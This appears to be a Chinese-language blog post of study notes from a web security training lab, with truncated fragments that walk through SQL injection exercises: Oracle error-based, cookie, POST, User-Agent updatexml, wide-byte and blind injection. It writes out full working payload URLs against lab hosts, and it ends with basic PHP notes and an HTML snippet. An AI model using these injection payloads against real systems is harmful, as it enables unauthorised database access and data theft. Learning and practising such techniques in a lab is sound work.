不知道为啥，我上传笔记老是卡住，可能是因为排版问题，下面将所有未发布的笔记打包上传！

http://o1.lab.aqlab.cn:81/?id=1%27%20and%201%20=ctxsys.drithsx.sn(1,(select%20banner%20from%20sys.v_$version%20where%20rownum=1))--得知是Oracle数据库，先查询数据库表，表名为admin，将admin表排除，继续查询数据，猜完表名，再猜列名http://o1.lab

提示得知，这是cookie注入的题，cookie注入的方式五花八门，这里我使用的是谷歌浏览器+ ModHeader插件使用cookie进行传参，返回正常，说明cookie可以传参，（cookie传参要URL编码）下面进行注入：猜字段数，字段数为10，猜解表名，默认为adminid=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin暴出输出位，使用联合查

6.6.1-SQL注入-Post注入Rank 1①分析登录语句 得知传参被单引号包括，尝试绕过，否则sql语句无法执行。 闭合单引号，后面添加注释符注释掉程序给的单引号。添加判断条件，or 1=1Or = “或者”OK，sql语句正常执行，继续注入。②猜字段数 登录成功，字段数为2。③猜解数据库名 无法输出后面的sql语句结果，得让它报错显示。 得

第一题： 得知注入点在User-Agent；①暴出数据库名：' or updatexml(1,concat(0x7e,database(),0x7e),1),1,1)# 得到数据库名：security②暴表名&列名 ' or updatexml(1,concat(0x7e,(select table_name from information_

①猜解字段数 发现sql语句无法正常执行，出现转意字符，尝试闭合反斜杠转意字符，得知\的URL编码是%5c,在\前面加个%df,%df%5c组合起来就是一个運字，这样sql语句就可以正常执行。 ②查询当前数据库： ③查询表名&列名：  ④查询列的数据：  第二题和一题一样的  第三题：抓包查看数据，发

==========自己总结的关于PHP的一些知识点==========1，PHP文件是以.PHP结尾；2，一局PHP代码写完，必须使用分号结束；3，echo是输出；（列：echo 'hello world';）；4，声明变量要在变量前加$；5，变量不能以数字或特殊字符开头；6，变量严格区分大小写；7，单引号不能解析变量，双引号可以解析变量；8，字符串和变量一起的时候，用.（点）来

<!DOCTYPE HTML><html><head><title>QQ空间</title><link rel="stylesheet" href="yzr.css" type="text/css"></head><body background=&

第一题：①猜解数据库长度：http://120.203.13.75:8150/New/BlindBased/RankOne/sql-one/?id=1%27%20and%20(length(database()))=8%20--+②猜解当前数据库名:http://120.203.13.75:8150/New/BlindBased/RankOne/sql-one/?id=1%27%20and%20(

①猜解字段数，传参全部被单引号包括，sql语句无法执行，尝试闭合：http://120.203.13.75:8150/New/ErrorBased/RankOne/sql-one/?id=1'%20order%20by%203%20--+得出字段数为四；②联合查询：http://120.203.13.75:8150/New/ErrorBased/RankOne/sql-one/?id=1&